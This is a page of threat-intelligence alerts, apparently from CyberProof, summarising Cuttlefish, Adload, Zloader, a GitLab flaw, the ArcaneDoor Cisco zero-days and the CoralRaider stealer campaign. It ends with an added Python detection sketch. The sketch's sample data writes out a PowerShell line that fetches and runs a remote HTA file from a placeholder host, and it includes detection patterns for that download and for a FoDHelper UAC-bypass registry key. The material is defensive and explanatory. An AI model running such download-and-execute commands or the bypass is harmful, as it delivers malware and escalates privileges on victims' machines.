Threat Alerts

Your place for the latest CyberProof cyber threat intelligence alerts and updates


Cuttlefish Malware Targets Routers to Intercept Cloud Service Credentials

06-May-2024
Label: Malware
Threat Level: Medium

Researchers have discovered a new malware named Cuttlefish that targets enterprise-level small office/home office routers to steal sensitive data from local networks.

The malware is modular, capable of DNS and HTTP hijacking, and can interact with devices on the network. A similarity to the activities of a China-related cluster called HiatusRat was observed, although no direct victim overlap was found.

Cuttlefish operates by sniffing network packets for authentication data, especially credentials for cloud services, and exfiltrates this data through proxies or VPNs on the compromised routers so that later use of the stolen credentials resembles legitimate user sign-ins. Active since at least July 2023 (with evidence of earlier iterations), the campaign predominantly affected Turkey from October 2023 to April 2024, implicating two main telecom providers and hitting 600 unique IPs, with a few global victims including satellite phone users and a possible US data center.

Cuttlefish emphasizes the need for robust cybersecurity measures, particularly for organizations relying on enterprise-grade SOHO routers. Continuous monitoring and upgrading security protocols are essential to mitigate the risks posed by such advanced malware platforms.

New Adload Adware Variants Challenge macOS Security Measures

06-May-2024
Label: Malware
Threat Level: Medium

Adload, a prominent adware distributor notorious for its relentless assaults on macOS systems, has swiftly adapted its strategies in response to Apple’s latest security updates. Despite Apple’s implementation of more than 80 new rules in the last two versions of the XProtect malware signature list, Adload’s developers have pivoted quickly and emerged with new variants of the adware, many of which manage to bypass not only XProtect but also other reputable security vendors. One such variant, labeled Adload Go, stands out due to its minimal detection rate on VirusTotal, with only a single detection or none at all among various engines.

These new Adload variants operate through a multi-stage attack chain, beginning with the execution of initial droppers designed to deliver subsequent payloads. Despite the absence of clear relationships to parent executables or applications, these droppers embed unique custom domains, following known Adload patterns.

Upon execution, the droppers initiate system information discovery via the ‘ioreg’ utility and attempt to retrieve remote data by resolving hardcoded domain names. The retrieved data is then written to a subdirectory in /tmp/.

Notably, despite Apple’s efforts to target artifacts associated with Adload in its signatures, the malware continues to evade detection, exploiting minor tweaks and alterations to bypass security measures.

Zloader's Stealthy Return: Sophisticated Evasion Tactics Revealed

06-May-2024
Label: Malware
Threat Level: Medium

Researchers have discovered that the Zloader trojan – dormant for nearly two years – has resurfaced with sophisticated updates designed to avoid detection. Leveraging the foundational Zeus source code, Zloader has implemented a refined anti-analysis feature that restricts its functionality strictly to the initially infected host. This adaptation demonstrates the malware’s evolution toward enhanced stealth and persistence in its operations.

The Zloader anti-analysis mechanism operates by checking for the presence of a specific registry key and value, uniquely created for each infected machine using a hardcoded seed. If these elements are not found – indicative of an attempt to analyze the malware in an environment other than the original infection – the malware will terminate. The deliberate generation of registry entries using the Mersenne Twister algorithm and their intricate encryption thwarts the ability to run or examine the malware on different systems.

The introduction of these complex anti-analysis techniques signifies a strategic shift in Zloader’s deployment, suggesting a move toward more targeted attacks. The challenge posed by these advanced features reinforces the importance of adaptive and proactive cybersecurity measures, underscored by a commitment to continuous vigilance and defense against such evolving threats.

Critical Vulnerability in GitLab is Being Actively Exploited in the Wild

06-May-2024
Label: Vulnerability
Threat Level: Medium

The critical GitLab vulnerability, CVE-2023-7028 with a CVSS score of 10.0, has been confirmed by the US Cybersecurity and Infrastructure Security Agency (CISA) as actively exploited in the wild, putting approximately 1,400 unpatched servers at risk.

Initially documented in the CTI Weekly Highlights report from January 15th, 2024, this flaw compromises the platform’s email verification process, potentially allowing unauthorized actors to initiate password resets.

Currently, no detailed information on the methods of exploitation has been shared. However, if successfully leveraged, this vulnerability could enable attackers to seize control of GitLab user accounts, extract confidential data, compromise credentials, and introduce malicious code into source code repositories, thereby posing a considerable risk of supply chain attacks.

Cisco Zero-Days Critical to Cyber Espionage Operations

29-Apr-2024
Label: Vulnerability
Threat Level: Medium

Researchers have detected a series of sophisticated cyberattacks dubbed ArcaneDoor, specifically targeting devices running Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software. The campaign has actively exploited two zero-day vulnerabilities:

CVE-2024-20353 (CVSS score: 8.6) – A Denial-of-Service vulnerability in Cisco ASA and FTD Software’s Web Services.

CVE-2024-20359 (CVSS score: 6.0) – A Persistent Local Code Execution vulnerability in Cisco ASA and FTD Software, which requires administrator-level privileges to exploit.

Additionally, a third vulnerability, CVE-2024-20358 (CVSS score: 6.0), a command injection flaw, was also identified and addressed following its discovery during internal testing, although it was not exploited in the ArcaneDoor campaign.

The attackers utilized these vulnerabilities to install malware, execute unauthorized commands, and potentially exfiltrate data. While the precise initial access method used in these breaches remains unclear, Cisco has released critical updates to address vulnerabilities and recommends immediate application to secure devices.

CoralRaider Campaign Leveraging Three Information Stealers

29-Apr-2024
Label: Malware
Threat Level: Medium

A newly identified cyber threat campaign, active since at least February 2024, involves distributing three well-known information stealers: Cryptbot, LummaC2, and Rhadamanthys, using sophisticated tactics to bypass antivirus defenses. The attackers exploit a Content Delivery Network (CDN) cache domain to host malicious HTML application (HTA) files and payloads. They employ a clever technique involving an embedded PowerShell command in a Windows shortcut file to initiate the infection. This method deceives network defenses, facilitating the download of the final malware directly onto the user’s device.

The infection process is intricate and multi-staged. It begins when a user opens a malicious shortcut file, typically delivered through a ZIP file via drive-by download techniques or phishing emails. The shortcut triggers a PowerShell command that downloads and executes an HTA file from an attacker-controlled CDN domain.

This HTA file is heavily obfuscated and contains JavaScript that decodes and runs a PowerShell decrypter script, which further decrypts and executes a PowerShell loader script in the user’s memory. This loader script is designed to perform several functions to evade detection and bypass User Account Control (UAC). It utilizes techniques such as modifying registry settings and employing Windows features like FoDHelper to run commands with elevated privileges without user prompts. The ultimate goal is to download and run one of the payloads: Cryptbot, LummaC2, or Rhadamanthys. These payloads target sensitive information such as system and browser data, credentials, cryptocurrency wallets, and financial information.
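The chain described above (shortcut, PowerShell fetching a remote HTA, mshta, then a FoDHelper UAC bypass) leaves process and registry artifacts that an endpoint sensor can flag. The following is an added detection sketch, not code from CyberProof or the campaign; it assumes Sysmon-style process-creation and registry-set events, and the registry path it watches for the FoDHelper bypass (the ms-settings `Shell\Open\command` key) comes from public documentation of that technique, not from this alert.

```python
"""Detection sketch for the CoralRaider-style chain: LNK -> powershell.exe downloading
an .hta -> mshta.exe -> registry change used by the FoDHelper UAC bypass."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:          # minimal Sysmon event 1 (process create) fields
    parent: str
    image: str
    cmdline: str


@dataclass
class RegEvent:           # minimal Sysmon event 13 (registry value set) fields
    image: str
    target: str


# Constructed sample telemetry for the example; not real events from the campaign.
PROC_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe",
              r'powershell -c "iwr https://cdn.example.invalid/x.hta -o $env:TEMP\x.hta; mshta $env:TEMP\x.hta"'),
    ProcEvent("powershell.exe", "mshta.exe", r"mshta C:\Users\u\AppData\Local\Temp\x.hta"),
    ProcEvent("explorer.exe", "powershell.exe", r"powershell -File C:\scripts\backup.ps1"),  # benign
]
REG_EVENTS = [
    RegEvent("powershell.exe", r"HKU\S-1-5-21-1\Software\Classes\ms-settings\Shell\Open\command\(Default)"),
    RegEvent("svchost.exe", r"HKLM\SYSTEM\CurrentControlSet\Services\Foo\Start"),  # benign
]

URL_HTA = re.compile(r"https?://\S+\.hta\b", re.I)
# Assumed FoDHelper artifact: per-user ms-settings protocol handler command (public technique docs).
MS_SETTINGS_CMD = re.compile(r"\\Classes\\ms-settings\\Shell\\Open\\command", re.I)


def detect_process_chain(events):
    """Return (rule, cmdline) pairs for the two suspicious process relationships."""
    findings = []
    for e in events:
        parent, image = e.parent.lower(), e.image.lower()
        # Shortcut-launched PowerShell (parent explorer.exe) pulling a remote HTA.
        if image == "powershell.exe" and parent == "explorer.exe" and URL_HTA.search(e.cmdline):
            findings.append(("remote_hta_download", e.cmdline))
        # mshta.exe spawned by PowerShell rather than by a user double-click.
        if image == "mshta.exe" and parent == "powershell.exe":
            findings.append(("mshta_from_powershell", e.cmdline))
    return findings


def detect_fodhelper_registry(events):
    """Return registry targets matching the ms-settings handler hijack used by FoDHelper bypasses."""
    return [e.target for e in events if MS_SETTINGS_CMD.search(e.target)]
```

Correlating both detectors on the same host within a short window (PowerShell from a shortcut, then mshta, then the ms-settings key write) gives a much higher-confidence alert than any single rule.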
